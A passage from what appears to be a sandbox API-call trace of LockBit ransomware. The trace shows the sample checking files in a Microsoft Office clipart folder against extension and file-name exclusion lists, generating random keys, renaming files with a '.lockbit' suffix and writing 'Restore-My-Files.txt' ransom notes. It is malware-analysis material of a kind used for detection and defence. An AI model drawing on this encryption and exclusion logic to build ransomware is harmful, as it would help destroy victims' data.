office\\clipart\\pub60cor\\j0178932.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.538] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.538] malloc (_Size=0x40068) returned 0x3d70450 [0147.538] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=35340) returned 1 [0147.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.540] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.542] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.542] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.544] free (_Block=0x1fa2ed8) [0147.544] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.544] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.544] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.544] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7d6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0179963.JPG", cAlternateFileName="")) returned 1 [0147.544] lstrcmpiW (lpString1=".", lpString2="J0179963.JPG") returned -1 [0147.544] lstrcmpiW (lpString1="..", lpString2="J0179963.JPG") returned -1 [0147.544] PathFindExtensionW (pszPath="J0179963.JPG") returned=".JPG" [0147.544] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.544] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.544] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.544] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.544] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.544] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.544] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.544] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.545] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.545] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.546] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.546] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.546] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.546] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.546] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.546] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.546] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.546] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0179963.JPG") returned 1 [0147.546] lstrcmpiW (lpString1="ntldr", lpString2="J0179963.JPG") returned 1 [0147.546] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0179963.JPG") returned 1 [0147.547] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0179963.JPG") returned -1 [0147.547] lstrcmpiW (lpString1="autorun.inf", lpString2="J0179963.JPG") returned -1 [0147.547] lstrcmpiW (lpString1="thumbs.db", lpString2="J0179963.JPG") returned 1 [0147.547] lstrcmpiW (lpString1="iconcache.db", lpString2="J0179963.JPG") returned -1 [0147.547] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.547] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned=".JPG" [0147.547] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.547] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.547] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.547] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.548] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.548] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.548] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG.lockbit") returned 72 [0147.548] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.549] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.549] malloc (_Size=0x40068) returned 0x3fb00b8 [0147.549] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=32110) returned 1 [0147.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0147.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0147.551] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0147.557] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.557] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.558] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.559] free (_Block=0x1fa2ed8) [0147.559] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.559] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.559] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x40e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0182689.JPG", cAlternateFileName="")) returned 1 [0147.559] lstrcmpiW (lpString1=".", lpString2="J0182689.JPG") returned -1 [0147.559] lstrcmpiW (lpString1="..", lpString2="J0182689.JPG") returned -1 [0147.559] PathFindExtensionW (pszPath="J0182689.JPG") returned=".JPG" [0147.559] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.560] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.560] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.561] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.561] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.562] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.562] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.562] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.562] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.562] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.562] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0182689.JPG") returned 1 [0147.562] lstrcmpiW (lpString1="ntldr", lpString2="J0182689.JPG") returned 1 [0147.562] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0182689.JPG") returned 1 [0147.562] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0182689.JPG") returned -1 [0147.562] lstrcmpiW (lpString1="autorun.inf", lpString2="J0182689.JPG") returned -1 [0147.562] lstrcmpiW (lpString1="thumbs.db", lpString2="J0182689.JPG") returned 1 [0147.562] lstrcmpiW (lpString1="iconcache.db", lpString2="J0182689.JPG") returned -1 [0147.562] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.562] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned=".JPG" [0147.562] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.562] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.562] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.562] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.562] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.562] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.562] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.563] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.563] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.564] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.564] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.564] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG.lockbit") returned 72 [0147.564] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0147.570] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.571] malloc (_Size=0x40068) returned 0x3df0008 [0147.571] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16615) returned 1 [0147.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.572] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.572] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.575] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.575] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.577] free (_Block=0x1fa2ed8) [0147.577] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.577] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.577] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.577] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5f48, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0182888.WMF", cAlternateFileName="")) returned 1 [0147.577] lstrcmpiW (lpString1=".", lpString2="J0182888.WMF") returned -1 [0147.577] lstrcmpiW (lpString1="..", lpString2="J0182888.WMF") returned -1 [0147.577] PathFindExtensionW (pszPath="J0182888.WMF") returned=".WMF" [0147.577] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.577] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.577] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.577] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.578] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.579] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW 